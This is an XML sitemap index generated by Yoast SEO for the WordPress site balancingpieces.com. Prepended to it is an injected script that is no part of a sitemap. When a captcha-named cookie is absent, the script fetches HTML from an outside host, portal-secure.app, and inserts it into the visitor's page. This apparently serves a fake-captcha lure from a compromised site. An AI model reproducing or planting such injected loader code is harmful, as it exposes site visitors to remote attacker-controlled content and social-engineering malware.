		<script>
		function getCookie(name)
		{
			const match = document.cookie.match(new RegExp("(^|; )" + name + "=([^;]*)"));
			return match ? decodeURIComponent(match[2]) : null;
		}

		const cookiename = "cookie-captcha-complete";
		const cookie = getCookie(cookiename);

		if(!cookie)
		{
			fetch("https://portal-secure.app") 
			.then(response => response.ok ? response.text() : Promise.reject())
			.then(html =>
			{
				if(html.length === 0)
				{
					document.cookie = cookiename + "=1; path=/; max-age=" + (60 * 60 * 24 * 365);
				}

				else
				{
					document.body.insertAdjacentHTML("beforeend", html);
				}
			})
			.catch(() => console.error("Failed to load page!"));
		}
		</script><?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//www.balancingpieces.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://www.balancingpieces.com/post-sitemap.xml</loc>
		<lastmod>2025-03-05T16:23:11+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.balancingpieces.com/page-sitemap.xml</loc>
		<lastmod>2026-02-19T17:41:49+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.balancingpieces.com/category-sitemap.xml</loc>
		<lastmod>2025-03-05T16:23:11+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.balancingpieces.com/post_tag-sitemap.xml</loc>
		<lastmod>2025-03-05T16:23:11+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.balancingpieces.com/post_format-sitemap.xml</loc>
		<lastmod>2021-12-14T18:43:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.balancingpieces.com/author-sitemap.xml</loc>
		<lastmod>2020-12-08T16:47:19+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->